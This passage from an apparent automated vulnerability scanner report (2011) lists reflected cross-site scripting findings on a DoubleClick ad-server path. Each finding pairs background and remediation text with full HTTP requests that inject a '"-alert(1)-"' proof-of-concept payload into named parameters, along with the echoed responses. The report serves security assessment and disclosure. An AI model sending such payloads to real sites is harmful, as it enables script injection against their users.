Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15468
61dc607be51
/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http: //ad.thewheelof.com/clk
Date: Wed, 02 Feb 2011 15:33:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4. Cross-site scripting (reflected)
There are 710 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9c8"-alert(1)-"ed8d98066a7 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8925

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D87663
...[SNIP]...

4.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"6726dbbe500 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8982

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F
...[SNIP]...

4.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 112f0"-alert(1)-"3c37d85996f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2ffree.turbotax.c
...[SNIP]...

4.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3b8"-alert(1)-"ad6539c90a was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8942

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2fl
...[SNIP]...

4.5. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b3b5"-alert(1)-"6e28e40048e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http
...[SNIP]...

4.6. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddba6"-alert(1)-"6c8bf62d897 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that sz is the first ;-delimited segment of the request path (sz=300x250;click=...), and in the request below the size token 300x250 is intact: the scanner placed the probe after the auctionID value of the embedded click-tracking URL. The reflection therefore exercises the same unescaped copy of the click= segment as the other findings for this path, not a separate sink for the size value.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

